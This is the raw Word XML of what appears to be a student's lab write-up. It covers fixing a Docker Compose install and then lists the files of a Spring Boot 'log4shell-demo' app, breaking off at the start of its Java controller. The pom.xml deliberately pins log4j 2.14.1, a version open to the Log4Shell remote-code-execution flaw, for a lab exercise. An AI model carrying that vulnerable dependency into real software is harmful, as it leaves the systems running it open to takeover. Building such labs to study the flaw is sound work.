        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker compose still would not work. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657837C5" w14:textId="31B0B4D2" w:rsidR="004E3498" w:rsidRPr="009F01AC" w:rsidRDefault="004E3498" w:rsidP="00806B89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinstalled Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6A783" w14:textId="42A818C0" w:rsidR="004E3498" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="00806B89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Seems like “</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">You're seeing the error because your system </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>does not yet support the docker compose plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, or it’s misconfigured.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F08AB" w14:textId="77777777" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="00806B89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Installed Docker manually: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002FDAC7" w14:textId="64916643" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ABCC4" w14:textId="66223E9E" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo chmod +x /usr/local/bin/docker-compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C9E25" w14:textId="7500EDA2" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker-compose version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D432C49" w14:textId="01B31BDE" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Didn’t work </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA13DF" w14:textId="3F8A5903" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinstalled again using compose binary and making it executable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C5459" w14:textId="3B7F55B1" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo curl -L "https://github.com/docker/compose/releases/download/v2.17.3/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A9DD6" w14:textId="347FBAAC" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo chmod +x /usr/local/bin/docker-compose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C81EF4" w14:textId="6911F4AF" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally got version </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Docker Compose version v2.17.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209A76C" w14:textId="25223EC5" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally able to </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker-compose build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731031CC" w14:textId="1B5518D1" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally able to </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker-compose up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F7C0B5" w14:textId="6BB6A00B" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WOOT WOOT LETS GOOOOO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8176F" w14:textId="57E09A14" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="004D77D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Code in </w:t>
      </w:r>
      <w:r w:rsidR="004D77D7" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Files: </w:t>
      </w:r>
      <w:r w:rsidR="004D77D7" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>As mentioned above the code provided did not work so I had to find code that will. I used below code instead:</w:t>
      </w:r>
      <w:r w:rsidR="004D77D7" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E1DB6D" w14:textId="60BD724E" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pom.xml: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EBF3B"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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B0463"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&lt;project xmlns="http://maven.apache.org/POM/4.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A842E86"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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF97505"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xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0AE5FA"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http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4925AB9E"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&lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4535B9B8"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p>
    <w:p w14:paraId="3922A235"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&lt;groupId&gt;com.example&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5A758"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&lt;artifactId&gt;log4shell-demo&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E19783"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&lt;version&gt;0.0.1-SNAPSHOT&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E4D71"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&lt;packaging&gt;jar&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DA69D"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p>
    <w:p w14:paraId="019DC894"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&lt;parent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D248CB1"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&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E361B40"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&lt;artifactId&gt;spring-boot-starter-parent&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC02707"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&lt;version&gt;2.5.5&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5FF4A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/parent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F7D82"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p>
    <w:p w14:paraId="6FBEA839"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&lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048798D"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&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BC234"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&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0636A1"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&lt;artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156AC2BD"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&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD9711"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&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735928CF"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&lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F91E6"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&lt;artifactId&gt;log4j-core&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CF268"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&lt;version&gt;2.14.1&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC4F0E"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&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931ACAB"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&lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9FB35"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&lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6E6FD"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&lt;artifactId&gt;log4j-api&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03383D5F"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&lt;version&gt;2.14.1&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97279A"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&lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6FA5F"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&lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FB433"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p>
    <w:p w14:paraId="7AC0F060"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&lt;build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D289A3"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&lt;plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7084E"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&lt;plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51068D39"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&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0364AB56"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&lt;artifactId&gt;spring-boot-maven-plugin&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DBDBC"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&lt;/plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234B7AD"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&lt;/plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7754A5"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&lt;/build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF70DE4"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&lt;/project&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDCB667" w14:textId="77777777" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652CACED" w14:textId="14363755" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099F390"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Stage 1: Build the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2185CB"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FROM maven:3.8.5-openjdk-11 AS build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16BC94"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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D28BF"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COPY . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C20FCF5"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RUN mvn clean package -DskipTests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895071D"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p>
    <w:p w14:paraId="483EC1A5"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Stage 2: Run the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97B62D"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FROM openjdk:11-jre-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934B105"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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1577CA09"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COPY --from=build /app/target/log4shell-demo-0.0.1-SNAPSHOT.jar /app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E7E1B"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ENTRYPOINT ["java", "-jar", "/app.jar"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DCA74"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p>
    <w:p w14:paraId="1AD6960D" w14:textId="0774ACF4" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7" w:rsidP="004D77D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28AF6F"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version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF24F8"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p>
    <w:p w14:paraId="4E9A0A4C"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services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689D50A"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app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE826C"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build: .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E665D"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9E4CF" w14:textId="77777777" w:rsidR="004D77D7" w:rsidRPr="009F01AC" w:rsidRDefault="004D77D7"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 "8080:8080"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E08ED6" w14:textId="77777777" w:rsidR="00E36C5C" w:rsidRPr="009F01AC" w:rsidRDefault="00E36C5C" w:rsidP="004D77D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p>
    <w:p w14:paraId="6240AA93" w14:textId="27D8B11F" w:rsidR="00E36C5C" w:rsidRPr="009F01AC" w:rsidRDefault="00E36C5C" w:rsidP="00E36C5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Logcontroller.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F189CA"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lastRenderedPageBreak/>
        <w:t>package com.example.log4shell;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FB9A9"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p>
    <w:p w14:paraId="42C279D6"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import org.springframework.boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8E0BB"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import org.springframework.boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62458A"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import org.springframework.web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712B6A4"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import org.apache.logging.log4j.Logger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5A6EB"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import org.apache.logging.log4j.LogManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02114A16"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p>
    <w:p w14:paraId="6C53D0C2"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@SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C871B"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@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258057A"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public class DemoApplication {</w:t>
